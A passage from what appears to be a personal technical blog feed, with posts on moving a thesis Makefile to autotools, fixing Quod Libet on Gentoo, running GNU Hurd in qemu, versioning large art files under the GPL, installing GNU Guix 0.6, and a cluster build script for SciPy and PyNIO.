[2]: Enigmail enables secure communication in Thunderbird:
    https://addons.mozilla.org/de/thunderbird/addon/enigmail/

[3]: GPG4win provides secure encryption for Windows:
    http://gpg4win.org/download.html

[4]: MacGPG provides encryption for MacOSX:
    https://gpgtools.org/

[5]: Encryption for other systems is available from the GnuPG website:
    https://www.gnupg.org/download/
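
If you prefer to check the signature by hand instead of through a mail client, here is a minimal command line sketch (assuming you saved the mail text as message.txt and the attached signature as signature.asc — both names are just examples):

gpg --verify signature.asc message.txt
# if the sender's key is not in your keyring yet, import it first:
# gpg --recv-keys <KEYID>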

Going from a simple Makefile to Autotools


Intro

I recently started looking into Autotools, to make it easier to run my code on multiple platforms.

Naturally you can use cmake or scons or waf or ninja or tup, all of which are interesting in their own respect. But none of them has seen the amount of testing which went into autotools, and none of them has the amount of tweaks needed to support about every system under the sun. And I recently found pyconfigure which allows using autotools with python and offers detection of library features.

Warning 2016: Contains some cargo-cult-programming — my current setup is cleaner thanks to using AC_CONFIG_LINKS in configure.ac.

I had already used Makefiles for easily storing the build information of anything from python projects (python setup.py build) to my PhD thesis with all the required graphs.

I also had used scons for those same tasks.

But I wanted to test what autotools have to offer. And I found no simple guide which showed me how to migrate from a Makefile to autotools - and what I could gain through that.

So I decided to write one.

My Makefile

The starting point is the Makefile I use for building my PhD. That’s pretty generic and just uses the most basic features of make.

If you do not know it yet: A basic makefile has really simple syntax:

# comments start with #
thing : required source files # separated by spaces
    build command
    second build command
# ^ this is a TAB.

The code above is a rule. If you put a file with this content into some folder using the filename Makefile and then run make thing in that folder (in a shell), the program “make” will check whether the source files have been changed after it last created the thing and if they have been changed, it will execute the build commands.

You can use things from other rules as source file for your thing and make will figure out all the tasks needed to create your thing.

My Makefile below creates plots from data and then builds a PDF from an org-mode file.

all: doktorarbeit.pdf sink.pdf

sink.pdf : sink.tex images/comp-t3-s07-tem-boas.png images/comp-t3-s07-tem-bona.png images/bona-marble.png images/boas-marble.png
    pdflatex sink.tex
    rm -f  *_flymake* flymake* *.log *.out *.toc *.aux *.snm *.nav *.vrb # kill litter

comp-t3-s07-tem-boas.png comp-t3-s07-tem-bona.png : nee-comp.pyx nee-comp.txt
    pyxplot nee-comp.pyx

doktorarbeit.pdf : doktorarbeit.org
    emacs --batch --visit "doktorarbeit.org" --funcall org-export-as-pdf  

Feature Equality

The first step is simple: How can I replicate with autotools what I did with the plain Makefile?

For that I create the files configure.ac and Makefile.am. The basic Makefile.am is simply my Makefile without any changes.

The configure.ac sets the project name, inits automake and tells autoreconf to generate a Makefile.

dnl run `autoreconf -i` to generate a configure script. 
dnl Then run ./configure to generate a Makefile.
dnl Finally run make to generate the project.

AC_INIT([Doktorarbeit Inverse GHG], [0.1], [arne.babenhauserheide@kit.edu])
dnl we use the automake option foreign here instead of gnu because I do not have a NEWS file and similar, yet.
AM_INIT_AUTOMAKE([foreign])
AC_CONFIG_FILES([Makefile])
AC_OUTPUT

Now, if I run `autoreconf -i` it generates a Makefile for me. Nothing fancy here: The Makefile just does what my old Makefile did.

First milestone reached: Feature Equality!

But the generated Makefile is much bigger, offers real --help output and can generate a distribution - which does not work yet, because it is missing the source files. But it clearly tells me that with `make distcheck`.

make dist: distributing the project

Since `make dist` does not work yet, let’s change that.

… easier said than done. It took me the better part of a day to figure out how to make it happy. Problems there:

  • I have to explicitly give automake the list of sources so it can copy them to the distributed package.
  • distcheck uses a separate build dir. Yes, this is the clean way, but it needs some hacking to get everything to work.
  • I use pyxplot for generating some plots. Pyxplot does not have a way (I know of) to search for datafiles in a different folder. I have to copy the files to the build dir and kill them after the build. But only if I use a separate build dir.
  • pdflatex can’t find included images. I have to adapt the TEXINPUTS environment variable to give it the srcdir as additional search path.
  • Some of my commands litter the build directory with temporary or intermediate files. I have to clean them up.

So, after much haggling with autotools, I have a working make distcheck:

pdf_DATA = sink.pdf doktorarbeit.pdf

sink = sink.tex
pkgdata_DATA = images/comp-t3-s07-tem-boas.png images/comp-t3-s07-tem-bona.png
dist_pkgdata_DATA = images/bona-marble.png images/boas-marble.png

plotdir = .
dist_plot_DATA = nee-comp.pyx nee-comp.txt

doktorarbeit = doktorarbeit.org

EXTRA_DIST = ${sink} ${dist_pkgdata_DATA} ${doktorarbeit}

MOSTLYCLEANFILES = \#* *~ *.bak # kill editor backups
CLEANFILES = ${pdf_DATA}
DISTCLEANFILES = ${pkgdata_DATA}

sink.pdf : ${sink} ${pkgdata_DATA} ${dist_pkgdata_DATA}
    TEXINPUTS=${TEXINPUTS}:$(srcdir)/:$(srcdir)/images// pdflatex $<
    rm -f  *_flymake* flymake* *.log *.out *.toc *.aux *.snm *.nav *.vrb # kill litter

${pkgdata_DATA} : ${dist_plot_DATA}
    $(foreach i,$^,if test "$(i)" != "$(notdir $(i))"; then cp -u "$(i)" "$(notdir $(i))"; fi;)
    ${MKDIR_P} images
    pyxplot $<
    $(foreach i,$^,if test "$(i)" != "$(notdir $(i))"; then rm -f "$(notdir $(i))"; fi;)

doktorarbeit.pdf : ${doktorarbeit}
    if test "$<" != "$(notdir $<)"; then cp -u "$<" "$(notdir $<)"; fi
    emacs --batch --visit "$(notdir $<)" --funcall org-export-as-pdf
    if test "$<" != "$(notdir $<)"; then rm -f "$(notdir $<)"; rm -f $(basename $(notdir $<)).tex $(basename $(notdir $<)).tex~; else rm -f $(basename $<).tex $(basename $<).tex~; fi

You might recognize that this is not the simple Makefile anymore. It is now a setup which defines files for distribution and has custom rules for preparing script runs and for cleanup.

But I can now make a fully working distribution, so when I want to publish my PhD thesis, I can simply add the generated release tarball. I work in a Mercurial repo, so I would more likely just include the repo, but there might be reasons for leaving out the history - if only because the history might grow quite big.

Second milestone reached: make distcheck!

An advantage is that in the process of preparing the dist, my automake file got cleanly separated into a section defining files and dependencies and one defining build rules.

But I now also understand where newer build tools like scons got their inspiration for the abstractions they use.

I should note, however, that if you build a software project in one of the languages supported by automake (C, C++, Python and quite a few others), you do not need to specify the build rules yourself.

And being able to freely mix the dependency declaration in automake style with Makefile rules gives a lot of flexibility which I missed in scons.

Finding programs

Now I can build and distribute my project, but I cannot yet make sure that the programs I need for building actually exist.

And that’s finally something which can really help my build, because it gives clear error messages when something is missing, and it allows users to specify which of these programs to use via the configure script. For example I could now build 5 different versions of Emacs and try the build with each of them.

Also I added cross compilation support, though that is a bit over the top for simple PDF creation :)

First off I edited my configure.ac to check for the tools:

dnl run `autoreconf -i` to generate a configure script. 
dnl Then run ./configure to generate a Makefile.
dnl Finally run make to generate the project.

AC_INIT([Doktorarbeit Inverse GHG], [0.1], [arne.babenhauserheide@kit.edu])
# Check for programs I need for my build
AC_CANONICAL_TARGET
AC_ARG_VAR([emacs], [How to call Emacs.])
AC_CHECK_TARGET_TOOL([emacs], [emacs], [no])
AC_ARG_VAR([pyxplot], [How to call the Pyxplot plotting tool.])
AC_CHECK_TARGET_TOOL([pyxplot], [pyxplot], [no])
AC_ARG_VAR([pdflatex], [How to call pdflatex.])
AC_CHECK_TARGET_TOOL([pdflatex], [pdflatex], [no])
AS_IF([test "x$pdflatex" = "xno"], [AC_MSG_ERROR([cannot find pdflatex.])])
AS_IF([test "x$emacs" = "xno"], [AC_MSG_ERROR([cannot find Emacs.])])
AS_IF([test "x$pyxplot" = "xno"], [AC_MSG_ERROR([cannot find pyxplot.])])
# Run automake
AM_INIT_AUTOMAKE([foreign])
AM_MAINTAINER_MODE([enable])
AC_CONFIG_FILES([Makefile])
AC_OUTPUT

And then I used the created variables in the Makefile.am: See the @-characters around the program names.

pdf_DATA = sink.pdf doktorarbeit.pdf

sink = sink.tex
pkgdata_DATA = images/comp-t3-s07-tem-boas.png images/comp-t3-s07-tem-bona.png
dist_pkgdata_DATA = images/bona-marble.png images/boas-marble.png

plotdir = .
dist_plot_DATA = nee-comp.pyx nee-comp.txt

doktorarbeit = doktorarbeit.org

EXTRA_DIST = ${sink} ${dist_pkgdata_DATA} ${doktorarbeit}

MOSTLYCLEANFILES = \#* *~ *.bak # kill editor backups
CLEANFILES = ${pdf_DATA}
DISTCLEANFILES = ${pkgdata_DATA}

sink.pdf : ${sink} ${pkgdata_DATA} ${dist_pkgdata_DATA}
    TEXINPUTS=${TEXINPUTS}:$(srcdir)/:$(srcdir)/images// @pdflatex@ $<
    rm -f  *_flymake* flymake* *.log *.out *.toc *.aux *.snm *.nav *.vrb # kill litter

${pkgdata_DATA} : ${dist_plot_DATA}
    $(foreach i,$^,if test "$(i)" != "$(notdir $(i))"; then cp -u "$(i)" "$(notdir $(i))"; fi;)
    ${MKDIR_P} images
    @pyxplot@ $<
    $(foreach i,$^,if test "$(i)" != "$(notdir $(i))"; then rm -f "$(notdir $(i))"; fi;)

doktorarbeit.pdf : ${doktorarbeit}
    if test "$<" != "$(notdir $<)"; then cp -u "$<" "$(notdir $<)"; fi
    @emacs@ --batch --visit "$(notdir $<)" --funcall org-export-as-pdf
    if test "$<" != "$(notdir $<)"; then rm -f "$(notdir $<)"; rm -f $(basename $(notdir $<)).tex $(basename $(notdir $<)).tex~; else rm -f $(basename $<).tex $(basename $<).tex~; fi  

Third milestone reached: Checking for required tools!

Summary

With this I’m at the limit of the advantages of autotools for my simple project.

They allow me to create and check a distribution tarball with relative ease (if I know how to do it), and I can use them to check for tools - and to specify alternative tools via the commandline.

For a C or C++ project, autotools would have given me a lot of other things for free, but even the basic features shown here can be useful.

You have to judge for yourself if they outweigh the cost of moving away from the dead simple Makefile syntax.

Comparing SCons

A little bonus I want to share.

I also wrote an SCons script as an alternative to my Makefile which I think might be interesting to you. It is almost equivalent to my Makefile since it can build my files, but scons does not match the features of the full autotools build and distribution system. Missing: cleaning up temporary files and creating a validated distribution tarball.

Missing in SCons: No distcheck!

You might notice that the more declarative style with explicit dependency information looks quite a bit more similar to automake than to plain Makefiles.

The following is my SConstruct file:

#!/usr/bin/env python
## I need a couple of special builders for my projects
# the $SOURCE replacement only uses the first source file. $SOURCES gives all.
# specifying all source files makes it possible to rerun the build if a single source file changed.
orgexportpdf = 'emacs --batch --visit "$SOURCE" --funcall org-export-as-pdf'
pyxplot = 'pyxplot $SOURCE'
# pdflatex is quite dirty. I directly clean up after it with rm.
pdflatex = 'pdflatex $SOURCE -o $TARGET; rm -f  *_flymake* flymake* *.log *.out *.toc *.aux *.snm *.nav *.vrb'

# build the PhD thesis from emacs org-mode.
Command("doktorarbeit.pdf", "doktorarbeit.org",
        orgexportpdf)

# create plots
Command(["images/comp-t3-s07-tem-boas.png", 
         "images/comp-t3-s07-tem-bona.png"], 
        ["nee-comp.pyx", 
         "nee-comp.txt"],
        pyxplot)

# build my sink.pdf
Command("sink.pdf", 
        ["sink.tex", 
         "images/comp-t3-s07-tem-boas.png", 
         "images/comp-t3-s07-tem-bona.png", 
         "images/bona-marble.png", 
         "images/boas-marble.png"],
        pdflatex)

# My editors leave tempfiles around. I want them gone after a build clean. This is not yet supported!
tempfiles = Glob('*~') + Glob('#*#') + Glob('*.bak')
# using this here would run the cleaning on every run.
#Command("clean", [], Delete(tempfiles))

If you want to integrate building with scons into a Makefile, the following lines allow you to run scons with `make sconsrun`. You might have to also mark sconsrun as .PHONY.

sconsrun : scons
    python scons/bootstrap.py -Q

scons : 
    hg clone https://bitbucket.org/ArneBab/scons

Here you can see part of the beauty of autotools, because you can just add this to your Makefile.am instead of the Makefile and it will work inside the full autotools project (though without the dist-integration). So autotools is a real superset of simple Makefiles.

Notes

If org-mode export keeps pestering you about selecting a TeX-master every time you build the PDF, add the following to your org-mode file:

#+BEGIN_LaTeX
%%% Local Variables:
%%% TeX-master: t
%%% End:
#+END_LaTeX

How to fix a bug, using the example of Quod Libet empty panes on Gentoo GNU/Linux (bug solving process)

PDF-version (for printing)

orgmode-version (for editing)

For a few days now my Quod Libet has been broken, showing only empty space instead of information panes.

2013-12-11-quod-libet-broken.png

I investigated halfheartedly, but did not find the cause with quick googling. Today I decided to change that. I document my path here, because I did not yet write about how I actually tackle problems like these - and I think I would have profited from having a writeup like this when I started, instead of having to learn it by trial-and-error.

Update: Quodlibet 2.6.3 is now in the Gentoo portage tree - using my ebuild. The update works seamlessly. So to get your Quodlibet 2.5 running again, just call emerge =media-sound/quodlibet-2.6.3 =media-plugins/quodlibet-plugins-2.6.3. Happy Hacking!

Update: I got a second reply in the bug tracker which solved the plugins problem: I had user-plugins which require Quod Libet 3. Solution: mv ~/.quodlibet/plugins ~/.quodlibet/plugins.for-ql3. Quod Libet works completely again.

Solution for the impatient: Update to Quod Libet 2.5.1. In Gentoo that’s easy.

1 Gathering Information

As starting point I installed the Quod Libet plugins (media-libs/quodlibet-plugins), thinking that the separation between plugins and mediaplayer might not be perfect. That did not fix the problem, but a look at the plugin listing gave me nice backtraces:

2013-12-11-quod-libet-broken-plugins.png

And these actually show the reason for the breakage: Cannot import GTK:

Traceback (most recent call last):
  File "/home/arne/.quodlibet/plugins/songsmenu/albumart.py", line 51, in <module>
    from gi.repository import Gtk, Pango, GLib, Gdk, GdkPixbuf
  File "/usr/lib64/python2.7/site-packages/gi/__init__.py", line 27, in <module>
    from ._gi import _API, Repository
ImportError: cannot import name _API

Let’s look which package this file belongs to:

equery belongs /usr/lib64/python2.7/site-packages/gi/__init__.py
 * Searching for /usr/lib64/python2.7/site-packages/gi/__init__.py ... 
dev-python/pygobject-3.8.3 (/usr/lib64/python2.7/site-packages/gi/__init__.py)

So I finally have an answer: pygobject changed the API. Can’t be hard to fix… (a realization process follows)

2 The solution-hunting process

  • let’s check the Gentoo forums for pygobject
  • pygobject now pulls systemd??? - and they wonder why I’m pissed off by systemd: hugely invasive changes just for some small packages… KDE gets rid of the monolithic approach, and now Gnome starts it, just much more invasive into the basic structure of all distros?
  • set the USE flag -systemd to avoid systemd (why didn’t I have that yet? I guess I did not expect that Gentoo would push that on me…)
  • check when I updated pygobject:
qlop -l pygobject
...
Thu Dec  5 00:26:27 2013 >>> dev-python/pygobject-3.8.3
  • a week ago - that fits the timeframe. Damn… pygobject-3.8.3, you have to go.
echo =dev-python/pygobject-3.8.3 >> /usr/portage/package.mask
emerge -u pygobject
  • hm, no, the backtrace was for the plugin, but when I start Quod Libet from the shell, I see this:
LANG=C quodlibet
/usr/lib64/python2.7/site-packages/quodlibet/qltk/songlist.py:44: GtkWarning: Unable to locate theme engine in module_path: "clearlooks",
  _label = gtk.Label().create_pango_layout("")
  • emerge x11-themes/clearlooks-phenix to get clearlooks again. Looks nicer now, but still not fixed.

2013-12-11-quod-libet-broken-clearlooks.png

  • back to the drawing board. Let’s tackle this pygobject thing: emerge -C =dev-python/pygobject-3.8.3/, emerge -1 =dev-python/pygobject-2.28.6-r55.
  • not fixed. OK… let’s report a bug: empty information panes (screenshots attached).

3 The core solution

In the bug report at Quod Libet I got a reply: Known issue with quodlibet 2.5 “which triggered a bug in a recent pygtk release, resulting in lists not showing”. The plugins seem to be unrelated. Solution to my immediate problem: Update to 2.5.1. That’s not yet in gentoo, but this is easy to fix:

cd /usr/portage/media-sound/
# create the category in my local portage overlay, defined as
# PORTAGE_OVERLAY=/usr/local/portage in /etc/make.conf
mkdir -p /usr/local/portage/media-sound
# copy over the quodlibet directory, keeping the permissions with -p
cp -rp quodlibet /usr/local/portage/media-sound
# most times it is enough to simply rename the ebuild to the new version
cd /usr/local/portage/media-sound/quodlibet
mv quodlibet-2.5.ebuild quodlibet-2.5.1.ebuild
# now prepare all the metadata portage needs - this requires
# app-portage/gentoolkit
ebuild quodlibet-2.5.1.ebuild digest compile 
# now it's prepared for the package manager. Just update it as usual:
emerge -u quodlibet

I wrote the solution in the Gentoo bug report. I should also state that the Gentoo package for Quod Libet is generally out of date (releases 2.6.3 and 3.0.2 are not yet in the tree).

Quod Libet works again.

2013-12-11-quod-libet-fixed.png

As soon as the ebuild in the portage tree is renamed, Quod Libet should work again for all Gentoo users.

The plugins still need to be fixed, but I’ll worry about that later.

4 Conclusion

Solving the core problem took me some time, but it wasn’t really complicated. The part of the solution process which got me forward boils down to:

  • checking the project bug tracker,
  • checking the distribution bug tracker,
  • reporting a bug for the project with the information I could gather - including screenshots (or anything else which shows the problem directly - see How to Report Bugs Effectively for hints on that), and
  • checking the reported bug again a few hours or days later - and synchronizing the information between the project bug tracker and the distribution bug tracker to help fixing the bug for all users of the distribution and of other distributions.

And that’s it: To get something working again, check the bug trackers, report bugs and help synchronizing bug tracker info.


How to run your own GNU Hurd (in 140 letters)

Don’t want to rely on others’ opinions about the Hurd? How to run your own GNU Hurd, in 140 letters:

wget http://people.debian.org/~sthibault/hurd-i386/debian-hurd.img.tar.gz; tar xf de*hu*gz; qemu-system-x86_64 -hda de*hu*g -m 1G

This is the GNU Hurd

For additional convenience and performance, setup ssh access and enable kvm:

wget http://people.debian.org/~sthibault/hurd-i386/debian-hurd.img.tar.gz; tar xf de*hu*gz; qemu-system-x86_64 -enable-kvm -net user,hostfwd=tcp:127.0.0.1:2222-:22 -net nic -m 1G -drive cache=writeback,file=$(ls de*hu*g)

⇒ login: root, no pw needed. Set a password for user demo:

passwd demo

⇒ log into your Hurd via ssh:

ssh demo@localhost -p 2222

That’s it: You run the Hurd. Why would you want to do that? See cat translator_intro — and much more.

Additional information:

Run your own GNU Hurd


Huge datafiles in free culture projects under GPL

4 ways in which large raw artwork files are treated in free culture projects to provide the editable source.1

In the discussion about license compatibility of the creativecommons sharealike license with the GPL, Anthony asked how the source requirement is met for artwork, which often has huge raw files. These are the 4 basic ways I described in my answer.

1. The Wesnoth Way

“The Source is what we have”

The project just asks artists for full resolution PNG image files (without all the layering information) - and only uses these to develop the art. This was spearheaded by the GPL-licensed strategy game Battle for Wesnoth.

This is a viable strategy and also allows developing art, though a bit less convenient than with the layered sources. For example the illustrator who created many of the images in the RPG I work on used our PNG instead of her photoshop file to extract a die from the cover she created for us. She took the chance to also touch up the colors a bit - she had learned some new tricks to improve her paintings.

This clearly complies with the GPL, because the GPL just requires providing the files actually used for editing the published work. If the released file is what you actually use to change published files, then the published file is the source.

2. The External Storage

“Use the FTP, Luke”

Here, files which are too big to be versioned effectively or which most people don’t need when working with the project get version-numbers and are put into an external storage - like an FTP server.

I do that for gimp-files: I put these into our public release-listing via FTP. For example I used that for a multi-layer cover which gets baked into our PDF.

3. The Elegant Way

“Make it so!”

Here huge files are simply versioned alongside other files and the versions to be used are created directly from the multi-layered files. The usual way to do that is a Makefile in which scripts explicitly define how the derived file can be extracted.

This is most elegant, because it has no duplication of information, the source is always trivial to find, it’s always clear that the derived file really originated from the source and it is easy to avoid quality loss or even reduce it later.

The disadvantage is that it can be very cumbersome to force new developers to get all the huge files and regenerate the derived files before being able to really start developing.

The common way to do this is a Makefile - for example the one I use for building my PhD thesis.
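
As a rough sketch of what such a rule can look like (the file names are just examples, and I assume here that ImageMagick’s convert flattens the raw file well enough — in a real project you would use whatever exporter matches your source format):

cover.png : cover.xcf
    convert cover.xcf -flatten cover.png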

4. Pragmatic Elegance

“Hybrids win”

All the ways above can be combined: Huge files are put in version control, but the derived files are included, too, to make it easier for new people to get in. Maybe the huge files are only included on request - for example they could be stubs with which the version control system can retrieve the full files when the user wants them. This can partially be done with the largefiles extension in Mercurial by just not getting the large files.
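
A minimal sketch of the largefiles variant (Mercurial commands; the file name is just an example):

$ echo -e '[extensions]\nlargefiles =' >> ~/.hgrc   # enable the bundled extension
$ hg add --large images/cover-raw.xcf               # track the huge raw file as a largefile
$ hg commit -m "add raw cover as largefile"
$ hg clone -U . /tmp/copy-without-checkout          # -U skips the checkout, so the large files are not fetched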

Also you can just keep separate raw files and derived files. This is also used in Battle for Wesnoth: Optimized files of the right size for the game are stored in one folder while the bigger full resolution files are stored separately.

If you want to include free art in a GPL-covered work, I hope this article gave you some inspiration!


  1. The die was created by Trudy Wenzel (2013) and is licensed under GPLv3 or later. 

Immutable function arguments and variables

  1. Dev A: “Fortran is totally outdated.”
  2. Dev B: “I wish we could declare objects in function arguments or variable values as immutable in Java and Javascript.”

Fortran developer silently weeps:

! immutable 2D array as argument in Fortran
  integer, intent(in) :: arg(:,:)
! constant value
  character(len=10), parameter :: numbers = "0123456789"

See parameter vs. intent(in).

(yes, I’m currently reading a Javascript book)

If you now want to see more of Fortran:

Installing GNU Guix 0.6, easily

Org-Source (for editing)

PDF (for printing)

“Got a power-outage while updating?
No problem: Everything still works”

GNU Guix is the new functional package manager from the GNU Project which complements the Nix-Store with a nice Guile Scheme based package definition format.

What sold it to me was “Got a power-outage while updating? No problem: Everything still works” from Ludovic’s Guix talk at the GNU Hacker Meeting 2013. My son once found the on-off button of our power connector while I was updating my Gentoo box. It took me 3 evenings to get it completely functional again. This would not have happened with Guix.

Update (2014-05-17): Thanks to zerwas from IRC @ freenode for the patch to guix 0.6 and nice cleanup!

Intro

Installation of GNU Guix is straightforward, except if you follow the docs, but it’s not as if we’re not used to that from other GNU utilities, which often terribly short-sell their quality with overly general documentation ☺

So I want to provide a short guide on how to set up and run GNU Guix with ease. My system natively runs Gentoo, so some details might vary for you. If you use Gentoo, you can simply copy the commands here into the shell, but better copy them to a text-file first to ensure that I do not try to trick you into doing evil things with the root access you need.

In short: This guide provides the First Contact and Black Triangle for GNU Guix.

Getting GNU Guix

mkdir guix && cd guix
wget http://alpha.gnu.org/gnu/guix/guix-0.6.tar.gz
wget http://alpha.gnu.org/gnu/guix/guix-0.6.tar.gz.sig
gpg --verify guix-0.?.tar.gz.sig

Installing GNU Guix

tar xf guix-0.?.tar.gz
cd guix-0.?
./configure && make -j16
sudo make install

Setting up GNU Guix

Build users

Build-users allow for strong separation of build processes: They cannot affect each other, because they actually run as different users.

sudo screen
groupadd guix-builder
for i in `seq 1 10`;
  do
    useradd -g guix-builder -G guix-builder           \
            -d /var/empty -s `which nologin`          \
            -c "Guix build user $i" --system          \
            guix-builder$i;
  done
exit

(if you do not have GNU screen yet, you should get it. It makes working on remote servers enjoyable.)

Add user work folder.

Also we want to run guix as a regular user, so we need to pre-create the user-specific profile directory. Note: This should really be done automatically.

sudo mkdir -p /usr/local/var/nix/profiles/per-user/$USER
sudo chown -R $USER:$USER /usr/local/var/nix/profiles/per-user/$USER

Fix store permissions

chgrp 1002 /nix/store; chmod 1775 /nix/store

Starting the guix daemon and making it launch at startup

this might be quite Gentoo-specific.

sudo screen
echo "#\!/bin/sh" >> /etc/local.d/guix-daemon.start
echo "guix-daemon --build-users-group=guix-builder &" >> /etc/local.d/guix-daemon.start
echo "#\!/bin/sh" >> /etc/local.d/guix-daemon.stop
echo "pkill guix-daemon" >> /etc/local.d/guix-daemon.stop
chmod +x /etc/local.d/guix-daemon.start
chmod +x /etc/local.d/guix-daemon.stop
exit

(the pkill is not the nice way of killing the daemon. Ideally the daemon should have a --kill option)

To avoid having to restart, we just launch the daemon once, now.

sudo /etc/local.d/guix-daemon.start

Adding the guix-installed programs to your PATH

Guix installs each state of the system in its own directory, which actually enables rollbacks. The current state is made available via ~/.guix-profile/, and so we need ~/.guix-profile/bin in our path:

echo "export PATH=$PATH:~/.guix-profile/bin" >> ~/.bashrc
. ~/.bashrc

Using guix

Guix comes with a quite complete commandline interface. The basics are listed below, with a short example session after the list:

  • Update the package listing: guix pull
  • List available packages: guix package -A
  • Install a package: guix package -i PACKAGE
  • Update all packages: guix package -u
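
A short example session might look like this (the package name is just an illustration):

guix pull
guix package -A | grep ^hello   # search the available packages
guix package -i hello           # install GNU hello into your profile
hello                           # now available via ~/.guix-profile/bin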

Experience

For a new distribution-tool, Guix is quite nice. Remember, though, that it builds on Nix: It is not a complete reinvention but rather “stands on the shoulders of giants”.

The download speeds are abysmal, though. http://hydra.gnu.org seems to have a horribly slow internet connection…

And what I direly missed is a short command explanation in the help output:

$ guix --help
Usage: guix COMMAND ARGS...
Run COMMAND with ARGS.

COMMAND must be one of the sub-commands listed below:

   build
   download
   gc
   hash
   import
   package
   pull
   refresh
   substitute-binary

Also I miss the categories I know from Gentoo: Having package-names like grue-hunter seems very unorganized compared to the games-text/grue-hunter which I know from Gentoo.

And it would be nice to have shorthands for the command names:

  • "guix pa -i" instead of "guix package -i" (though there is a namespace clash with guix pull :( )
  • "guix pu" for "guix pull"

and so on.

But anyway: A very interesting project which I plan to keep tracking. It might allow me to do less risky local package installs of stuff I need, like small utilities I wrote myself.

The big advantage of that would be, that I could actually take them with me when I have to use different distros (though I’ve been a happy Gentoo user for ~10 years and I don’t see it as likely that I’ll switch completely: Guix would have to include all the roughly 30k packages in Gentoo to actually be a full-fledged alternative - and provide USE flags and all the convenient configurability which makes Gentoo such a nice experience).

Using guix for such small stuff would allow me to decouple experiments from my production environment (which has to keep working).

But enough talk: Have fun with GNU Guix and Happy Hacking!

Author: Arne Babenhauserheide

Created: 2014-05-17 Sa 23:40

Emacs 24.3.1 (Org mode 8.2.5h)



Installing Scipy and PyNIO on a Bare Cluster with the Intel Compiler

2 years ago I had the task of running a python-program using scipy on our university cluster, using the Intel Compiler. I needed all those (as well as PyNIO and some other stuff) for running TM5 with the python shell on the HC3 of KIT.

This proved to be quite a bit more challenging than I had expected - but it was very interesting, too (and there I learned the basics of GNU autotools which still help me a lot).

But no one should have to go to the same effort with as little guidance as I had, so I decided to publish the script and the patches I created for installing everything we needed.1

The script worked 2 years ago, so you might have to fix some bits. I won’t promise that this contains everything you need to run the script - or that it won’t be broken when you install it. Actually I won’t promise anything at all, except that if the stuff here had been available 2 years ago, that could have saved me about 2 months of time (each of the patches here required quite some tracking of problems, experimenting and fixing, until it provided basic functionality - but actually I enjoyed doing that - I learned a lot - I just don’t want to be forced to do it again). Still, this stuff contains quite some hacks - even a few ugly ones. But it worked.

2 libraries and programs which get installed (=requirements)

This script requires and installs quite a few libraries. I retrieved most of the following tarballs from my Gentoo distfiles dir after installing the programs locally. I uploaded them to draketo.de/dateien/scipy-pynio-deps. These files are included there:

satexp_utils.so also needs interpolate_levels.F90 which I think I am not allowed to share, so you’re on your own there. Guess why I do not like using non-free (or not-guaranteed-to-be-free) software.

3 Known Bugs

3.1 HDF autotools patch throws away some CFLAGS

The hdf autotools patch only retrieves the last CFLAG instead of all:

export CC='gcc-4.8.1 -Wall -Werror'                                                          
echo $CC | grep \ - | sed 's/.* -/-/'                                                                     
-Werror

If you have the regexp-fu to fix that, please improve the patch! But without perl (otherwise we’d have to install perl, too).
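
A perl-free sketch that keeps all the flags would be to cut away the first word (the compiler itself) instead of everything up to the last dash — untested against the full configure.ac, so treat it as a starting point:

export CC='gcc-4.8.1 -Wall -Werror'
echo $CC | sed 's/^[^ ]*//;s/^ *//'
-Wall -Werror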

3.2 SciPy inline-C via weave does not work

Udo Grabowski, the maintainer of our institute’s Sun cluster, somehow managed to get that working on OpenIndiana with the Sun compiler, but since I did not need it, I did not dig deeper to see whether I could adapt his solutions to the Intel compiler.

5 Implementation

This is the full install script I used to install all necessary dependencies.

#!/bin/bash

# Untar

for i in *.tar* *.tgz; do
  tar xvf $i || exit
done

# Install

PREFIX=/home/ws/babenhau/
PYPREFIX=/home/ws/babenhau/python/

# Blas

cd BLAS
cp ../blas-make.inc make.inc || exit
#make -j9 clean
F77=ifort make -j9 || exit
#make -j9 install --prefix=$PREFIX
# OR for Intel compiler:
ifort -fPIC -FI -w90 -w95 -cm -O3 -xHost -unroll -c *.f || exit
#Continue below irrespective of compiler:
ar r libfblas.a *.o || exit
ranlib libfblas.a || exit
cd ..
ln -s BLAS blas

## Lapack

cd lapack-3.3.1
ln -s ../blas
# this has a hardcoded absolute path to blas in it: replace is with the appropriate one for you.
cp ../lapack-make.inc make.inc || exit
make -j9 clean  || exit
make -j9
make -j9 || exit
cp lapack_LINUX.a libflapack.a || exit
#make -j9 install --prefix=$PREFIX
cd ..

# C interface

patch -p0 < lapacke-ifort.diff

cd lapacke
# patch for lapack 3.3.1 and blas
for i in gnu inc intel ; do 
    sed -i s/lapack-3\.2\.1\\/lapack\.a/lapack-3\.3\.1\\/lapack_LINUX.a/ make.$i; 
    sed -i s/lapack-3\.2\.1\\/blas\.a/blas\\/blas_LINUX.a/ make.$i; 
done

make -j9 clean || exit
#make -j9
LINKER=ifort LDFLAGS=-nofor-main make -j9 # || exit
#LINKER=ifort LDFLAGS=-nofor-main make -j9 install
cd ..

## ATLAS

cd ATLAS
cp ../Make.Linux_HC3 . || exit
echo "ATLAS needs manual intervention. Run make by hand first."
#echo "just say yes. It makes some stuff we need later."
#make
#mv bin/Linux_UNKNOWNSSE2_8 bin/Linux_HC3
#for i in bin/Linux_HC3/*; do sed -i s/UNKNOWNSSE2_8/HC3/ $i ; done
#rm bin/Linux_HC3/Make.inc
#cd bin/Linux_HC3/
#ln -s ../../Make.Linux_HC3 Make.inc
#cd -

make -j9 install arch=Linux_HC3 || exit
cd lib
for i in Linux_HC3/* ; do ln -s $i ; done
cd ../bin
for i in Linux_HC3/* ; do ln -s $i ; done
cd ../include
for i in Linux_HC3/* ; do ln -s $i ; done
cd ..
cd ..

# Numpy and SciPy with intel compilers

# Read this: http://marklodato.github.com/2009/08/30/numpy-scipy-and-intel.html

# patching

patch -p0 < SuiteSparse.diff  || exit
patch -p0 < SuiteSparse-umfpack.diff  || exit

rm numpy
ln -s numpy-*.*.*/ numpy
patch -p0 < numpy-icc.diff  || exit
patch -p0 < numpy-icpc.diff || exit
patch -p0 <<EOF
--- numpy/numpy/distutils/fcompiler/intel.py      2009-03-29 07:24:21.000000000 -0400
+++ numpy/numpy/distutils/fcompiler/intel.py  2009-08-06 23:08:59.000000000 -0400
@@ -47,6 +47,7 @@
     module_include_switch = '-I'

     def get_flags(self):
+        return ['-fPIC', '-cm']
         v = self.get_version()
         if v >= '10.0':
             # Use -fPIC instead of -KPIC.
@@ -63,6 +64,7 @@
         return ['-O3','-unroll']

     def get_flags_arch(self):
+        return ['-xHost']
         v = self.get_version()
         opt = []
         if cpu.has_fdiv_bug():
EOF
